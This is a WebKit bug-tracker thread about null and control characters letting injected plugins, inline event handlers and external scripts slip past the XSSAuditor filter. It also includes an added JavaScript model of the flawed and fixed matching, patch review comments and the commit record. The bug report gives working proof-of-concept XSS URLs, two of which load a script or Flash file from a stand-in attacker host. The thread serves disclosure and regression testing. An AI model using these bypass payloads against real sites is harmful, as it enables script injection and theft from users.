Null/control characters in HTTP GET/POST data can bypass XSSAuditor with respect to injected plugin-based objects, inline event handlers, and external scripts.

Examples:

Plugin-Injection:
http://good.webblaze.org/dbates/xsstest.php?q=%3Cobject%20classid=%22clsid:d27cdb6e-ae6d-11cf-96b8-444553540000%22%20codebase=%22http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab%22%20id=%22flashMov%22%3E%3Cparam%20name=%22movie%22%20value=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20/%3E%3Cparam%20name=%22allowScriptAccess%22%20value=%22always%22%20/%3E%3Cembed%20src=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20name=%22flashMov%22%20allowScriptAccess=%22always%22%20type=%22application/x-shockwave-flash%22%20/%3E%3C/object%3E

Inline Event Handler:
http://good.webblaze.org/dbates/xsstest.php?q=%3Ca%20href=%22about:blank%22%20onclick=%22al%00ert(5)%22%3Ed%3C/a%3E

External Scripts:
http://good.webblaze.org/dbates/xsstest.php?q=<script src='http://evil.webblaze.org/dbates/xss.js'></script>
Created attachment 32431
Patch with tests
(In reply to comment #1)
> Created an attachment (id=32431)
> Patch with tests

I patched this by telling XSSAuditor::findInRequest when to allow/disallow null and non-null control characters. I also changed the console message type in method XSSAuditor::canLoadObject from OtherMessageSource to JSMessageSource, since DumpRenderTree doesn't seem to dump OtherMessageSource errors, as needed by various plugin-based test cases.
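The bypass in the bug description and the fix described in the comment above both come down to one comparison: the auditor asks whether the script, handler or plugin URL the parser produced can be found in the request, and a NUL or control byte that the parser drops but the auditor keeps breaks that match. The following is an added example, not WebKit code and not the patch attached to this bug: a reduced model of a findInRequest-style check with the naive comparison beside a canonicalising one, run over constructed URLs modelled on the report's three cases (the plugin case is trimmed to a single embed tag). The parser's behaviour (dropping NUL and non-whitespace C0/DEL control characters) and the function names are assumptions of the example, not taken from the WebKit source.

```javascript
// Added example, not WebKit code: a reduced model of an XSSAuditor-style
// "did this script come from the request?" check (the role played by
// XSSAuditor::findInRequest), showing why NUL and other control characters in
// the request let the report's injections past a naive comparison and how
// canonicalising the request before the search closes the gap.
//
// Assumptions (mine, not from the bug report): the auditor receives (a) the
// decoded value of each query parameter and (b) the text the parser actually
// produced for an inline handler, script URL or plugin URL. The parser is
// modelled as dropping NUL and non-whitespace C0/DEL control characters, so
// "al\0ert(5)" in the request becomes "alert(5)" in the page.

const DROPPED_CONTROL_CHARS = /[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]/g;

// How the page's parser sees injected text (model of tokenizer behaviour).
function asParsed(text) {
  return text.replace(DROPPED_CONTROL_CHARS, '');
}

// Decoded query-parameter values; percent-decoding turns %00 into "\u0000".
function requestValues(url) {
  return Array.from(new URL(url).searchParams.values());
}

// Vulnerable check: look for the parsed snippet verbatim in the raw request.
function naiveFindInRequest(url, parsedSnippet) {
  return requestValues(url).some((v) => v.includes(parsedSnippet));
}

// Hardened check: canonicalise each request value the same way the parser
// would before searching, so control characters cannot split the match.
function hardenedFindInRequest(url, parsedSnippet) {
  return requestValues(url).some((v) => asParsed(v).includes(parsedSnippet));
}

// Policy: anything that demonstrably came from the request is blocked.
function audit(findInRequest, url, parsedSnippet) {
  return findInRequest(url, parsedSnippet) ? 'blocked' : 'allowed';
}

// Constructed cases modelled on the report's URLs. `parsed` is what the
// parser would hand the auditor for the injected element.
const CASES = [
  {
    name: 'inline handler with NUL',
    url: 'http://good.webblaze.org/dbates/xsstest.php?q=%3Ca%20href=%22about:blank%22%20onclick=%22al%00ert(5)%22%3Ed%3C/a%3E',
    parsed: 'alert(5)',
  },
  {
    name: 'plugin URL with \\x05',
    url: 'http://good.webblaze.org/dbates/xsstest.php?q=%3Cembed%20src=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20type=%22application/x-shockwave-flash%22%3E',
    parsed: 'http://evil.webblaze.org/dbates/execGetURL.swf',
  },
  {
    name: 'external script, no control character',
    url: "http://good.webblaze.org/dbates/xsstest.php?q=<script src='http://evil.webblaze.org/dbates/xss.js'></script>",
    parsed: 'http://evil.webblaze.org/dbates/xss.js',
  },
];

function runCases() {
  return CASES.map((c) => ({
    name: c.name,
    naive: audit(naiveFindInRequest, c.url, c.parsed),
    hardened: audit(hardenedFindInRequest, c.url, c.parsed),
  }));
}

for (const r of runCases()) {
  console.log(`${r.name}: naive=${r.naive} hardened=${r.hardened}`);
}
```

The two control-character cases are allowed by the naive check and blocked by the canonicalising one; the plain script case is blocked by both, so canonicalising does not change the baseline. The caveat a real implementation has to get right is the one the fix above alludes to: the set of characters stripped before the search must match what the tokenizer drops in that context (NUL versus other control characters, attribute value versus script body). Stripping more than the parser does produces false positives that block legitimate page content; stripping less leaves exactly this bypass open.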
Created attachment 32433
Patch with tests

Forgot to put email address in change log for LayoutTests.
Comment on attachment 32433
Patch with tests

What is execGetURL.swf? I don't think we can put flash movies in layout tests. This probably isn't needed because the auditor blocks the load anyway.

Also, where is script-tag-post-control-char.html?
(In reply to comment #4)
> (From update of attachment 32433)
> What is execGetURL.swf ? I don't think we can put flash movies in layout
> tests. This probably isn't needed because the auditor blocks the load anyway.
> Also, where is script-tag-post-control-char.html ?

Right. I just used it as a placeholder for the plugin-based tests, but it isn't needed as you pointed out. I'll add such a test and post the patch again.
Awesome. Thanks Dan.
Created attachment 32462
Patch with tests

Removed file execGetURL.swf. Added test case script-tag-post-control-char.html.
Comment on attachment 32462
Patch with tests

This looks great. Thanks Dan. The ChangeLog still lists the SWF, but that's not a big deal. I'll try to remember to remove it when I land the patch.
Sending        LayoutTests/ChangeLog
Adding         LayoutTests/http/tests/security/xssAuditor/anchor-url-dom-write-location-inline-event-null-char-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/anchor-url-dom-write-location-inline-event-null-char.html
Adding         LayoutTests/http/tests/security/xssAuditor/embed-tag-control-char-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/embed-tag-control-char.html
Adding         LayoutTests/http/tests/security/xssAuditor/embed-tag-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/embed-tag-null-char-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/embed-tag-null-char.html
Adding         LayoutTests/http/tests/security/xssAuditor/embed-tag.html
Adding         LayoutTests/http/tests/security/xssAuditor/link-onclick-control-char-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/link-onclick-control-char.html
Adding         LayoutTests/http/tests/security/xssAuditor/link-onclick-null-char-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/link-onclick-null-char.html
Adding         LayoutTests/http/tests/security/xssAuditor/object-embed-tag-control-char-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/object-embed-tag-control-char.html
Adding         LayoutTests/http/tests/security/xssAuditor/object-embed-tag-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/object-embed-tag-null-char-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/object-embed-tag-null-char.html
Adding         LayoutTests/http/tests/security/xssAuditor/object-embed-tag.html
Adding         LayoutTests/http/tests/security/xssAuditor/object-tag-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/object-tag.html
Adding         LayoutTests/http/tests/security/xssAuditor/script-tag-post-control-char-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/script-tag-post-control-char.html
Adding         LayoutTests/http/tests/security/xssAuditor/script-tag-post-null-char-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/script-tag-post-null-char.html
Adding         LayoutTests/http/tests/security/xssAuditor/script-tag-with-source-control-char-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/script-tag-with-source-control-char.html
Adding         LayoutTests/http/tests/security/xssAuditor/script-tag-with-source-null-char-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/script-tag-with-source-null-char.html
Sending        WebCore/ChangeLog
Sending        WebCore/page/XSSAuditor.cpp
Sending        WebCore/page/XSSAuditor.h
Transmitting file data ................................
Committed revision 45639.
http://trac.webkit.org/changeset/45639